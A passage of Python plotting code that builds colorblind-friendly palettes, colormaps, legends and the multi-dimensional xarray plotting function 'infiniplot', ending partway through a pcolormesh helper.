'xtick.minor.visible': True,\n 'ytick.color': draw_color,\n 'ytick.minor.visible': True,\n }\n\n\ndef use_neutral_style(fn):\n import matplotlib as mpl\n\n @functools.wraps(fn)\n def new_fn(\n *args,\n use_neutral_style=True,\n draw_color=(.5, .5, .5),\n **kwargs\n ):\n if not use_neutral_style:\n return fn(*args, **kwargs)\n\n style = get_neutral_style(draw_color=draw_color)\n\n with mpl.rc_context(style):\n return fn(*args, **kwargs)\n\n return new_fn\n\n\n# colorblind palettes by Bang Wong (https://www.nature.com/articles/nmeth.1618)\n\n_COLORS_DEFAULT = (\n '#56B4E9', # light blue\n '#E69F00', # orange\n '#009E73', # green\n '#D55E00', # red\n '#F0E442', # yellow\n '#CC79A7', # purple\n '#0072B2', # dark blue\n)\n_COLORS_SORTED = (\n '#0072B2', # dark blue\n '#56B4E9', # light blue\n '#009E73', # green\n '#F0E442', # yellow\n '#E69F00', # orange\n '#D55E00', # red\n '#CC79A7', # purple\n)\n\n\ndef mod_sat(c, mod):\n \"\"\"Modify the luminosity of rgb color ``c``.\n \"\"\"\n from matplotlib.colors import hsv_to_rgb, rgb_to_hsv\n\n h, s, v = rgb_to_hsv(c[:3])\n return (*hsv_to_rgb((h, mod * s, v)), 1.0)\n\n\ndef auto_colors(N):\n import math\n from matplotlib.colors import LinearSegmentedColormap\n\n if N < len(_COLORS_DEFAULT):\n return _COLORS_DEFAULT[:N]\n\n cmap = LinearSegmentedColormap.from_list('wong', _COLORS_SORTED)\n\n xs = list(map(cmap, np.linspace(0, 1.0, N)))\n\n # modulate color saturation with sine to generate local distinguishability\n # ... but only turn on gradually for increasing number of nodes\n sat_mod_period = min(4, N / 7)\n sat_mod_factor = max(0.0, 2 / 3 * math.tanh((N - 7) / 4))\n\n return [\n mod_sat(\n c, 1 - sat_mod_factor * math.sin(math.pi * i / sat_mod_period)**2\n )\n for i, c in enumerate(xs)\n ]\n\n\ndef color_to_colormap(c, vdiff=0.5, sdiff=0.25):\n import matplotlib as mpl\n rgb = mpl.colors.to_rgb(c)\n h, s, v = mpl.colors.rgb_to_hsv(rgb)\n\n vhi = min(1.0, v + vdiff / 2)\n vlo = max(0.0, vhi - vdiff)\n vhi = vlo + vdiff\n\n shi = min(1.0, s + sdiff / 2)\n slo = max(0.0, shi - sdiff)\n shi = slo + sdiff\n\n hsv_i = (h, max(slo, 0.0), min(vhi, 1.0))\n hsv_f = (h, min(shi, 1.0), max(vlo, 0.0))\n\n c1 = mpl.colors.hsv_to_rgb(hsv_i)\n c2 = mpl.colors.hsv_to_rgb(hsv_f)\n cdict = {\n 'red': [(0.0, c1[0], c1[0]), (1.0, c2[0], c2[0])],\n 'green': [(0.0, c1[1], c1[1]), (1.0, c2[1], c2[1])],\n 'blue': [(0.0, c1[2], c1[2]), (1.0, c2[2], c2[2])],\n }\n return mpl.colors.LinearSegmentedColormap('', cdict)\n\n\ndef get_default_cmap(i, vdiff=0.5, sdiff=0.25):\n return color_to_colormap(_COLORS_DEFAULT[i], vdiff=vdiff, sdiff=sdiff)\n\n\ndef to_colormap(c, **autohue_opts):\n import numbers\n import matplotlib as mpl\n from matplotlib import pyplot as plt\n\n if isinstance(c, mpl.colors.Colormap):\n return c\n\n if isinstance(c, numbers.Number):\n return cimple(c, **autohue_opts)\n\n try:\n return plt.get_cmap(c)\n except ValueError:\n return color_to_colormap(c)\n\n\ndef _make_bold(s):\n return r'$\\bf{' + s.replace('_', r'\\_') + r'}$'\n\n\n_LINESTYLES_DEFAULT = (\n 'solid',\n (0.0, (3, 1)),\n (0.5, (1, 1)),\n (1.0, (3, 1, 1, 1)),\n (1.5, (3, 1, 3, 1, 1, 1)),\n (2.0, (3, 1, 1, 1, 1, 1)),\n)\n\n\n_MARKERS_DEFAULT = (\n 'o',\n 'X',\n 'v',\n 's',\n 'P',\n 'D',\n '^',\n 'h',\n '*',\n 'p',\n '<',\n 'd',\n '8',\n '>',\n 'H',\n)\n\n\ndef init_mapped_dim(\n sizes,\n domains,\n values,\n labels,\n mapped,\n base_style,\n ds,\n name,\n dim,\n order=None,\n dim_label=None,\n custom_values=None,\n default_values=None,\n):\n if isinstance(dim, (tuple, list)) and all(x in 
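# The palette helpers above in brief: small requests reuse the Wong
# colorblind palette directly, larger ones interpolate the sorted palette
# and modulate saturation for local distinguishability.
_few = auto_colors(5)    # hex strings straight from _COLORS_DEFAULT
_many = auto_colors(20)  # RGBA tuples with sinusoidal saturation modulation
_cmap = color_to_colormap('#0072B2')  # light-to-dark ramp of a single hue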
ds.dims for x in dim):\n # create a new nested effective dimension\n new_dim = \", \".join(dim)\n ds = ds.stack({new_dim: dim})\n dim = new_dim\n\n elif (dim is not None) and (dim not in ds.dims):\n # attribute is just manually specified, not mapped to dimension\n base_style[name] = dim\n sizes[name] = 1\n return ds, None\n\n if (dim is not None) and (order is not None):\n # select and order along dimension\n ds = ds.sel({dim: list(order)})\n\n if dim is not None:\n ds = ds.dropna(dim, how='all')\n\n domains[name] = ds[dim].values\n sizes[name] = len(domains[name])\n labels[dim] = _make_bold(dim) if dim_label is None else dim_label\n mapped.add(dim)\n\n if custom_values is None:\n if default_values is not None:\n if callable(default_values):\n # allow default values to depend on number of values\n default_values = default_values(sizes[name])\n\n values[name] = tuple(\n x for x, _ in zip(default_values, range(sizes[name]))\n )\n else:\n values[name] = custom_values\n\n else:\n sizes[name] = 1\n\n return ds, dim\n\n\ndef _do_axes_formatting(\n axs,\n col,\n row,\n labels,\n domains,\n sizes,\n x,\n y,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n):\n # perform axes level formatting\n from matplotlib.ticker import (\n AutoMinorLocator,\n LogLocator,\n NullFormatter,\n ScalarFormatter,\n StrMethodFormatter,\n )\n\n for (i, j), ax in np.ndenumerate(axs):\n\n # only change this stuff if we created the figure\n title = []\n if col is not None:\n title.append(f\"{labels[col]}={domains['col'][j]}\")\n if row is not None:\n title.append(f\"{labels[row]}={domains['row'][i]}\")\n if title:\n title = \", \".join(title)\n ax.text(0.5, 1.0, title, transform=ax.transAxes,\n horizontalalignment='center', verticalalignment='bottom')\n\n # only label outermost plot axes\n if i + 1 == sizes[\"row\"]:\n ax.set_xlabel(labels[x])\n if j == 0:\n ax.set_ylabel(labels[y])\n\n # set some nice defaults\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n if grid:\n ax.grid(True, which=grid_which, alpha=grid_alpha)\n ax.set_axisbelow(True)\n\n if xlim is not None:\n ax.set_xlim(xlim)\n if ylim is not None:\n ax.set_ylim(ylim)\n\n if xscale is not None:\n ax.set_xscale(xscale)\n if yscale is not None:\n ax.set_yscale(yscale)\n\n for scale, base, axis in [\n (xscale, xbase, ax.xaxis),\n (yscale, ybase, ax.yaxis),\n ]:\n if scale == 'log':\n axis.set_major_locator(LogLocator(base=base, numticks=6))\n if base != 10:\n if isinstance(base, int):\n axis.set_major_formatter(StrMethodFormatter(\"{x:.0f}\"))\n else:\n axis.set_major_formatter(ScalarFormatter())\n if base < 3:\n subs = [1.5]\n else:\n subs = np.arange(2, base)\n axis.set_minor_locator(LogLocator(base=base, subs=subs))\n axis.set_minor_formatter(NullFormatter())\n elif scale == 'symlog':\n # TODO: choose some nice defaults\n pass\n else:\n axis.set_minor_locator(AutoMinorLocator(5))\n\n for hline in hspans:\n ax.axhline(hline, color=span_color, alpha=span_alpha,\n linestyle=span_linestyle, linewidth=span_linewidth)\n for vline in vspans:\n ax.axvline(vline, color=span_color, alpha=span_alpha,\n linestyle=span_linestyle, linewidth=span_linewidth)\n\n\ndef _create_legend(\n axs,\n legend_opts,\n handles,\n legend_merge,\n legend_entries,\n legend_labels,\n legend_extras,\n hue,\n hue_order,\n color,\n color_order,\n marker,\n marker_order,\n markersize,\n markersize_order,\n markeredgecolor,\n 
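# Hedged standalone restatement of the non-base-10 log handling above
# (function name illustrative): major ticks at powers of `base` with plain
# integer labels, plus evenly spread unlabelled minors.
import numpy as np
from matplotlib.ticker import LogLocator, NullFormatter, StrMethodFormatter

def format_log_axis(axis, base=2):
    axis.set_major_locator(LogLocator(base=base, numticks=6))
    axis.set_major_formatter(StrMethodFormatter('{x:.0f}'))
    subs = [1.5] if base < 3 else np.arange(2, base)
    axis.set_minor_locator(LogLocator(base=base, subs=subs))
    axis.set_minor_formatter(NullFormatter())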
markeredgecolor_order,\n linewidth,\n linewidth_order,\n linestyle,\n linestyle_order,\n labels,\n legend_reverse,\n legend_ncol,\n sizes,\n split_handles,\n base_style,\n):\n from matplotlib.lines import Line2D\n\n try:\n # try to extend current legend with more entries\n legend_handles = axs[0, -1].get_legend().get_lines()\n legend_handles.append(\n Line2D([0], [0], markersize=0, linewidth=0, label='')\n )\n except AttributeError:\n legend_handles = []\n\n legend_opts = {} if legend_opts is None else legend_opts\n\n if handles and legend_merge:\n # show every unique style combination as single legend try\n\n if legend_entries:\n # only keep manually specified legend entries\n remove = set()\n for k in handles:\n for dim, val in k:\n if dim in legend_entries:\n if val not in legend_entries[dim]:\n remove.add(k)\n for k in remove:\n del handles[k]\n\n sorters = []\n legend_title = []\n for dim, dim_order in [\n (hue, hue_order),\n (color, color_order),\n (marker, marker_order),\n (markersize, markersize_order),\n (markeredgecolor, markeredgecolor_order),\n (linewidth, linewidth_order),\n (linestyle, linestyle_order),\n ]:\n if dim is not None and labels[dim] not in legend_title:\n # check if not in legend_title, as multiple attributes can\n # be mapped to the same dimension\n legend_title.append(labels[dim])\n\n if dim is not None and dim_order is not None:\n sorters.append((dim, dim_order.index))\n else:\n sorters.append((dim, lambda x: x))\n\n def legend_sort(key_handle):\n loc = dict(key_handle[0])\n return tuple(\n sorter(loc.get(dim, None)) for dim, sorter in sorters\n )\n\n legend_handles.extend(\n v for _, v in\n sorted(\n handles.items(), key=legend_sort, reverse=legend_reverse\n )\n )\n\n if legend_ncol is None:\n if sizes[\"color\"] == 1 or len(handles) <= 10:\n legend_ncol = 1\n else:\n legend_ncol = sizes[\"hue\"]\n\n legend_opts.setdefault('title', ', '.join(legend_title))\n legend_opts.setdefault('ncol', legend_ncol)\n\n elif split_handles:\n # separate legend for each style\n\n if legend_entries:\n # only keep manually specified legend entries\n for k, vals in legend_entries.items():\n split_handles[k] = {\n key: val for key, val in split_handles[k].items()\n if key in vals\n }\n\n base_style[\"color\"] = (0.5, 0.5, 0.5)\n base_style[\"marker\"] = ''\n base_style[\"linestyle\"] = ''\n\n ncol = len(split_handles)\n nrow = max(map(len, split_handles.values()))\n\n for legend_dim, inputs in split_handles.items():\n legend_handles.append(\n Line2D(\n [0], [0],\n markersize=0,\n linewidth=0,\n label=labels[legend_dim]\n )\n )\n for key, style in sorted(\n inputs.items(),\n key=lambda x: x[0],\n # key=lambda x: 1,\n reverse=legend_reverse,\n ):\n\n if any(\"marker\" in prop for prop in style):\n style.setdefault('marker', 'o')\n if any(\"line\" in prop for prop in style):\n style.setdefault('linestyle', '-')\n if 'color' in style:\n style.setdefault('marker', '.')\n style.setdefault('linestyle', '-')\n\n legend_handles.append(\n Line2D([0], [0], **{**base_style, **style}, label=str(key))\n )\n\n if legend_ncol is None:\n npad = nrow - len(inputs)\n else:\n npad = 1\n for _ in range(npad):\n legend_handles.append(\n Line2D([0], [0], markersize=0, linewidth=0, label='')\n )\n\n if legend_ncol is None:\n legend_opts.setdefault('ncol', ncol)\n\n if legend_extras is not None:\n for extra in legend_extras:\n if not isinstance(extra, Line2D):\n extra = Line2D([0], [0], **extra)\n legend_handles.append(extra)\n else:\n legend_handles = None\n\n if legend_labels is not None:\n\n for lh, 
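# Hedged sketch of the spacer trick used in `_create_legend` above:
# zero-size Line2D handles act as blank rows or group headers, padding each
# per-style group so the legend columns line up.
from matplotlib.lines import Line2D

_header = Line2D([0], [0], markersize=0, linewidth=0, label='group title')
_spacer = Line2D([0], [0], markersize=0, linewidth=0, label='')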
label in zip(legend_handles, legend_labels):\n lh.set_label(label)\n\n if legend_handles is not None:\n lax = axs[0, -1]\n legend_opts.setdefault('loc', 'upper left')\n legend_opts.setdefault('bbox_to_anchor', (1.0, 1.0))\n legend_opts.setdefault('columnspacing', 1.0)\n legend_opts.setdefault('edgecolor', 'none')\n legend_opts.setdefault('framealpha', 0.0)\n lax.legend(handles=legend_handles, **legend_opts)\n\n\n@show_and_close\n@use_neutral_style\ndef infiniplot(\n ds,\n x,\n y=None,\n z=None,\n *,\n bins=None,\n bins_density=True,\n aggregate=None,\n aggregate_method='median',\n aggregate_err_range=0.5,\n err=None,\n err_style=None,\n err_kws=None,\n xlink=None,\n color=None,\n colors=None,\n color_order=None,\n color_label=None,\n colormap_start=0.0,\n colormap_stop=1.0,\n hue=None,\n hues=None,\n hue_order=None,\n hue_label=None,\n palette=None,\n autohue_start=0.6,\n autohue_sweep=-1.0,\n autohue_opts=None,\n marker=None,\n markers=None,\n marker_order=None,\n marker_label=None,\n markersize=None,\n markersizes=None,\n markersize_order=None,\n markersize_label=None,\n markeredgecolor='white',\n markeredgecolor_order=None,\n markeredgecolor_label=None,\n markeredgecolors=None,\n linewidth=None,\n linewidths=None,\n linewidth_order=None,\n linewidth_label=None,\n linestyle=None,\n linestyles=None,\n linestyle_order=None,\n linestyle_label=None,\n text=None,\n text_formatter=str,\n text_opts=None,\n col=None,\n col_order=None,\n col_label=None,\n row=None,\n row_order=None,\n row_label=None,\n alpha=1.0,\n join_across_missing=False,\n err_band_alpha=0.1,\n err_bar_capsize=1,\n xlabel=None,\n ylabel=None,\n xlim=None,\n ylim=None,\n xscale=None,\n yscale=None,\n xbase=10,\n ybase=10,\n vspans=(),\n hspans=(),\n span_color=(0.5, 0.5, 0.5),\n span_alpha=0.5,\n span_linewidth=1,\n span_linestyle=':',\n grid=True,\n grid_which='major',\n grid_alpha=0.1,\n legend=True,\n legend_ncol=None,\n legend_merge=False,\n legend_reverse=False,\n legend_entries=None,\n legend_labels=None,\n legend_extras=None,\n legend_opts=None,\n title=None,\n ax=None,\n axs=None,\n format_axs=None,\n figsize=None,\n height=3,\n width=None,\n hspace=0.12,\n wspace=0.12,\n sharex=True,\n sharey=True,\n **kwargs,\n):\n \"\"\"\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot.\n x : str\n Name of x-axis dimension.\n y : str\n Name of y-axis dimension.\n aggregate : str or tuple[str], optional\n Name of dimension(s) to aggregate before plotting.\n aggregate_method : str, optional\n Aggregation method used to show main line.\n aggregate_err_range : float, optional\n Inter-quantile range to use to show aggregation bands.\n \"\"\"\n import matplotlib as mpl\n from matplotlib import pyplot as plt\n\n autohue_opts = {} if autohue_opts is None else autohue_opts\n autohue_opts.setdefault(\"val1\", 1.0)\n autohue_opts.setdefault(\"sat1\", 0.3)\n autohue_opts.setdefault(\"val2\", 0.6)\n\n if text is not None:\n text_opts = {} if text_opts is None else text_opts\n text_opts.setdefault('size', 6)\n text_opts.setdefault('horizontalalignment', 'left')\n text_opts.setdefault('verticalalignment', 'bottom')\n text_opts.setdefault('clip_on', True)\n\n if err_kws is None:\n err_kws = {}\n\n # if only one is specified allow it to be either\n if (hue is not None) and (color is None):\n color, color_order, colors = hue, hue_order, hues\n hue = hue_order = hues = None\n\n # default style options\n base_style = {\n 'alpha': alpha,\n 'markersize': 6,\n 'color': '#0ca0eb',\n 'marker': '.',\n 'markeredgecolor': 'white',\n }\n # the 
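# Hedged usage sketch for `infiniplot` (all dims illustrative): map one
# dimension to color and aggregate another into a median line with a
# quantile band, assuming the `show_and_close` wrapper hands back
# (fig, axs) as elsewhere in this module.
import numpy as np
import xarray as xr

_rng = np.random.default_rng(1)
_ds = xr.Dataset(
    {'energy': (('method', 'seed', 'time'),
                _rng.normal(size=(2, 5, 30)).cumsum(axis=-1))},
    coords={'method': ['a', 'b'], 'seed': range(5), 'time': range(30)},
)
infiniplot(_ds, x='time', y='energy', color='method',
           aggregate=['seed'], err_style='band')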
size of each mapped dimension\n sizes = {}\n # the domain (i.e. input) of each mapped dimension\n domains = {}\n # the range (i.e. output) of each mappend dimension\n values = {}\n # how to label each mapped dimension\n labels = {\n x: x if xlabel is None else xlabel,\n y: y if ylabel is None else ylabel,\n }\n\n # work out all the dim mapping information\n\n def default_colormaps(N):\n if N <= 0:\n hs = _COLORS_DEFAULT[:N]\n else:\n hs = np.linspace(\n autohue_start, autohue_start + autohue_sweep, N, endpoint=False\n )\n return [to_colormap(h, **autohue_opts) for h in hs]\n\n # drop irrelevant variables and dimensions\n ds = ds.drop_vars([k for k in ds if k not in (x, y, z, err)])\n possible_dims = set()\n if x in ds.data_vars:\n possible_dims.update(ds[x].dims)\n if y in ds.data_vars:\n possible_dims.update(ds[y].dims)\n if z in ds.data_vars:\n possible_dims.update(ds[z].dims)\n ds = ds.drop_dims([k for k in ds.dims if k not in possible_dims])\n\n mapped = set()\n\n ds, hue = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"hue\", hue, hue_order, hue_label,\n custom_values=(\n [to_colormap(h, **autohue_opts) for h in hues]\n if hues is not None else None\n ),\n default_values=default_colormaps,\n )\n ds, color = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"color\", color, color_order, color_label,\n custom_values=colors,\n default_values=lambda N: np.linspace(colormap_start, colormap_stop, N)\n )\n\n if (hue is not None) and (color is not None):\n # need special label\n labels[f\"{hue}, {color}\"] = f\"{labels[hue]}, {labels[color]}\"\n\n if (hue is None) and (color is not None):\n # set a global colormap or sequence\n if colors is None:\n cmap_or_colors = (\n to_colormap(palette) if palette is not None else\n auto_colors(sizes[\"color\"])\n )\n else:\n cmap_or_colors = values[\"color\"]\n\n ds, marker = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"marker\", marker, marker_order, marker_label,\n custom_values=markers,\n default_values=itertools.cycle(_MARKERS_DEFAULT)\n )\n ds, markersize = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"markersize\", markersize, markersize_order, markersize_label,\n custom_values=markersizes,\n default_values=lambda N: np.linspace(3.0, 9.0, N)\n )\n ds, markeredgecolor = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"markeredgecolor\", markeredgecolor,\n markeredgecolor_order, markeredgecolor_label,\n custom_values=markeredgecolors,\n default_values=lambda N: auto_colors(N)\n )\n ds, linestyle = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"linestyle\", linestyle, linestyle_order, linestyle_label,\n custom_values=linestyles,\n default_values=itertools.cycle(_LINESTYLES_DEFAULT)\n )\n ds, linewidth = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"linewidth\", linewidth, linewidth_order, linewidth_label,\n custom_values=linewidths,\n default_values=lambda N: np.linspace(1.0, 3.0, N)\n )\n ds, col = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"col\", col, col_order, col_label,\n )\n ds, row = init_mapped_dim(\n sizes, domains, values, labels, mapped, base_style, ds,\n \"row\", row, row_order, row_label,\n )\n\n # compute which dimensions are not target or mapped dimensions\n unmapped = sorted(set(ds.dims) - mapped - {x, y, z, xlink})\n\n is_histogram = y is None\n if is_histogram:\n # assume we want a 
histogram: create y as probability density / counts\n import xarray as xr\n\n # bin over all unmapped dimensions\n ds = ds.stack({'__hist_dim__': unmapped})\n\n # work out the bin coordinates\n if bins is None or isinstance(bins, int):\n if bins is None:\n nbins = min(max(3, int(ds['__hist_dim__'].size ** 0.5)), 50)\n else:\n nbins = bins\n xmin, xmax = ds[x].min(), ds[x].max()\n bins = np.linspace(xmin, xmax, nbins + 1)\n elif not isinstance(bins, np.ndarray):\n bins = np.asarray(bins)\n\n bin_coords = (bins[1:] + bins[:-1]) / 2\n\n if bins_density:\n y = f'prob({x})'\n else:\n y = f'count({x})'\n\n if ylabel is None:\n labels[y] = y\n else:\n labels[y] = ylabel\n\n ds = (\n xr.apply_ufunc(\n lambda x: np.histogram(x, bins=bins, density=bins_density)[0],\n ds[x],\n input_core_dims=[['__hist_dim__']],\n output_core_dims=[[x]],\n vectorize=True,\n )\n .to_dataset(name=y)\n .assign_coords({x: bin_coords})\n )\n kwargs.setdefault(\"drawstyle\", \"steps-mid\")\n\n # get the target data array and possibly aggregate some dimensions\n if aggregate:\n if aggregate is True:\n # select all unmapped dimensions\n aggregate = unmapped\n\n # compute data ranges to maybe show spread bars or bands\n if aggregate_err_range == \"std\":\n\n da_std_mean = ds[y].mean(aggregate)\n da_std = ds[y].std(aggregate)\n\n da_ql = da_std_mean - da_std\n da_qu = da_std_mean + da_std\n\n elif aggregate_err_range == \"stderr\":\n\n da_stderr_mean = ds[y].mean(aggregate)\n da_stderr_cnt = ds[y].notnull().sum(aggregate)\n da_stderr = ds[y].std(aggregate) / np.sqrt(da_stderr_cnt)\n\n da_ql = da_stderr_mean - da_stderr\n da_qu = da_stderr_mean + da_stderr\n\n else:\n aggregate_err_range = min(max(0.0, aggregate_err_range), 1.0)\n ql = 0.5 - aggregate_err_range / 2.0\n qu = 0.5 + aggregate_err_range / 2.0\n da_ql = ds[y].quantile(ql, aggregate)\n da_qu = ds[y].quantile(qu, aggregate)\n\n # default to showing spread as bands\n if err is None:\n err = True\n if err_style is None:\n err_style = \"band\"\n\n # main data for central line\n ds = getattr(ds, aggregate_method)(aggregate)\n\n # default to bars if err not taken from aggregating\n if err_style is None:\n err_style = 'bars'\n\n # all the coordinates we will iterate over\n remaining_dims = []\n remaining_sizes = []\n for dim, sz in ds.sizes.items():\n if dim not in (x, y, z, xlink):\n remaining_dims.append(dim)\n remaining_sizes.append(sz)\n ranges = list(map(range, remaining_sizes))\n\n # maybe create the figure and axes\n if ax is not None:\n if axs is not None:\n raise ValueError(\"cannot specify both `ax` and `axs`\")\n axs = np.array([[ax]])\n\n if axs is None:\n if figsize is None:\n if width is None:\n width = height\n if height is None:\n height = width\n figsize = (width * sizes[\"col\"], height * sizes[\"row\"])\n\n fig, axs = plt.subplots(\n sizes[\"row\"], sizes[\"col\"],\n sharex=sharex, sharey=sharey,\n squeeze=False,\n gridspec_kw={'hspace': hspace, 'wspace': wspace},\n figsize=figsize,\n )\n fig.patch.set_alpha(0.0)\n else:\n fig = None\n\n if (fig is not None) and (title is not None):\n fig.suptitle(title)\n\n if z is not None:\n return _plot_pcolormesh(\n ds,\n x,\n y,\n z,\n ranges,\n remaining_dims,\n row,\n col,\n axs,\n palette,\n fig,\n format_axs,\n labels,\n domains,\n sizes,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n )\n\n # iterate over and plot all data\n handles = {}\n split_handles = collections.defaultdict(\n 
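# Hedged standalone restatement of the apply_ufunc binning above: stack the
# dims to histogram over into one, then map np.histogram across whatever
# dims remain (all names illustrative).
import numpy as np
import xarray as xr

_da = xr.DataArray(np.random.default_rng(2).normal(size=(100, 8)),
                   dims=['sample', 'rep'])
_stacked = _da.stack({'__hist_dim__': ['sample', 'rep']})
_bins = np.linspace(float(_da.min()), float(_da.max()), 21)
_prob = xr.apply_ufunc(
    lambda v: np.histogram(v, bins=_bins, density=True)[0],
    _stacked,
    input_core_dims=[['__hist_dim__']],
    output_core_dims=[['x']],
    vectorize=True,
).assign_coords(x=(_bins[1:] + _bins[:-1]) / 2)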
lambda: collections.defaultdict(dict)\n )\n\n x_is_constant = (x not in ds.data_vars)\n if x_is_constant:\n # is a constant coordinate\n xdata = ds[x].values\n\n for iloc in itertools.product(*ranges):\n # current coordinates\n loc = dict(zip(remaining_dims, iloc))\n\n # get the right set of axes to plot on\n if row is not None:\n i_ax = loc[row]\n else:\n i_ax = 0\n if col is not None:\n j_ax = loc[col]\n else:\n j_ax = 0\n ax = axs[i_ax, j_ax]\n\n # map coordinate into relevant styles and keep track of each uniquely\n sub_key = {}\n specific_style = {}\n\n # need to handle hue and color separately\n if color is not None:\n if hue is not None:\n ihue = loc[hue]\n hue_in = domains[\"hue\"][ihue]\n sub_key[hue] = hue_in\n cmap_or_colors = values[\"hue\"][ihue]\n\n icolor = loc[color]\n color_in = domains[\"color\"][icolor]\n if not callable(cmap_or_colors):\n color_out = cmap_or_colors[icolor]\n else:\n color_out = cmap_or_colors(values[\"color\"][icolor])\n\n sub_key[color] = color_in\n specific_style[\"color\"] = color_out\n if hue is None:\n legend_dim = color\n legend_in = color_in\n else:\n legend_dim = \", \".join((hue, color))\n legend_in = \", \".join(map(str, (hue_in, color_in)))\n\n split_handles[legend_dim][legend_in][\"color\"] = color_out\n else:\n legend_dim = None\n\n for prop, dim in [\n (\"marker\", marker),\n (\"markersize\", markersize),\n (\"markeredgecolor\", markeredgecolor),\n (\"linewidth\", linewidth),\n (\"linestyle\", linestyle),\n ]:\n if dim is not None:\n idx = loc[dim]\n prop_in = domains[prop][idx]\n prop_out = values[prop][idx]\n sub_key[dim] = prop_in\n specific_style[prop] = prop_out\n\n if dim in (color, hue):\n split_handles[legend_dim][legend_in][prop] = prop_out\n else:\n split_handles[dim][prop_in][prop] = prop_out\n\n # get the masked x and y data\n ds_loc = ds.isel(loc)\n mask = ds_loc[y].notnull().values\n\n if not x_is_constant:\n # x also varying\n xdata = ds_loc[x].values\n # both x and y must be non-null\n mask &= ds_loc[x].notnull().values\n\n if not np.any(mask):\n # don't plot all null lines\n continue\n\n if not join_across_missing:\n # reset mask\n data_mask = ()\n else:\n data_mask = mask\n\n xmdata = xdata[data_mask]\n ymdata = ds_loc[y].values[data_mask]\n\n if (err is not None):\n\n if (err is True) and (aggregate is not None):\n da_ql_loc = da_ql.isel(loc)\n da_qu_loc = da_qu.isel(loc)\n y1 = da_ql_loc.values[data_mask]\n y2 = da_qu_loc.values[data_mask]\n yneg = ymdata - y1\n ypos = y2 - ymdata\n else:\n yerr_mdata = ds_loc[err].values[data_mask]\n yneg = - yerr_mdata\n ypos = + yerr_mdata\n y1 = ymdata + yneg\n y2 = ymdata + ypos\n\n if err_style == 'bars':\n ax.errorbar(\n x=xmdata, y=ymdata, yerr=[np.abs(yneg), np.abs(ypos)],\n fmt='none',\n capsize=err_bar_capsize,\n **{**base_style, **specific_style, **err_kws},\n )\n elif err_style == 'band':\n ax.fill_between(\n x=xmdata, y1=y1, y2=y2,\n color=specific_style.get(\"color\", base_style[\"color\"]),\n alpha=err_band_alpha,\n **err_kws,\n )\n\n if is_histogram:\n ax.fill_between(\n x=xmdata, y1=ymdata, y2=0,\n step={\n None: None,\n 'default': None,\n 'steps': 'pre',\n 'steps-pre': 'pre',\n 'steps-mid': 'mid',\n 'steps-post': 'post',\n }[kwargs.get(\"drawstyle\", None)],\n color=mpl.colors.to_rgb(\n specific_style.get(\"color\", base_style[\"color\"])\n ),\n alpha=err_band_alpha,\n )\n\n plot_opts = {**base_style, **specific_style}\n\n # do the plotting!\n handle, = ax.plot(\n xmdata, ymdata,\n label=\", \".join(map(str, sub_key.values())),\n **plot_opts, **kwargs,\n )\n\n # add a 
text label next to each point\n if text is not None:\n # need raw mask for text\n smdata = ds_loc[text].values[mask]\n for txx, txy, txs in zip(xdata[mask], ds_loc[y].values[mask], smdata):\n\n specific_text_opts = {}\n if 'color' not in text_opts:\n # default to line color\n specific_text_opts['color'] = plot_opts['color']\n\n ax.text(\n txx, txy, text_formatter(txs),\n **text_opts, **specific_text_opts,\n )\n\n # only want one legend entry per unique style\n key = frozenset(sub_key.items())\n handles.setdefault(key, handle)\n\n if (fig is not None) or format_axs is True:\n _do_axes_formatting(\n axs,\n col,\n row,\n labels,\n domains,\n sizes,\n x,\n y,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n )\n\n # create a legend\n if legend:\n _create_legend(\n axs,\n legend_opts,\n handles,\n legend_merge,\n legend_entries,\n legend_labels,\n legend_extras,\n hue,\n hue_order,\n color,\n color_order,\n marker,\n marker_order,\n markersize,\n markersize_order,\n markeredgecolor,\n markeredgecolor_order,\n linewidth,\n linewidth_order,\n linestyle,\n linestyle_order,\n labels,\n legend_reverse,\n legend_ncol,\n sizes,\n split_handles,\n base_style,\n )\n\n return fig, axs\n\n\ndef _plot_pcolormesh(\n ds,\n x,\n y,\n z,\n ranges,\n remaining_dims,\n row,\n col,\n axs,\n palette,\n fig,\n format_axs,\n labels,\n domains,\n sizes,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n):\n import matplotlib as mpl\n\n xdata = ds[x].values\n ydata = ds[y].values\n\n zdata_all = ds[z].values\n zdata_all = zdata_all[np.isfinite(zdata_all)]\n zmax = np.max(zdata_all)\n zmin = np.min(zdata_all)\n max_mag = max(abs(zmax), abs(zmin))\n\n norm = mpl.colors.Normalize(vmin=zmin, vmax=zmax)\n\n for iloc in itertools.product(*ranges):\n # current coordinates\n loc = dict(zip(remaining_dims, iloc))\n\n # get the right set of axes to plot on\n if row is not None:\n i_ax = loc[row]\n else:\n i_ax = 0\n if col is not None:\n j_ax = loc[col]\n else:\n j_ax = 0\n ax = axs[i_ax, j_ax]\n\n zdata = ds[z].isel(loc).transpose(y, x).values\n\n # get the masked x and y data\n if palette is None:\n C = zdata\n mask = np.isfinite(C)\n zdata = np.empty(C.shape + (4,))\n zdata[mask] = to_colors(C[mask], alpha_pow=0.0, max_mag=max_mag)[0]\n zdata[~mask] = (.5, .5, .5, .5)\n else:\n zdata = 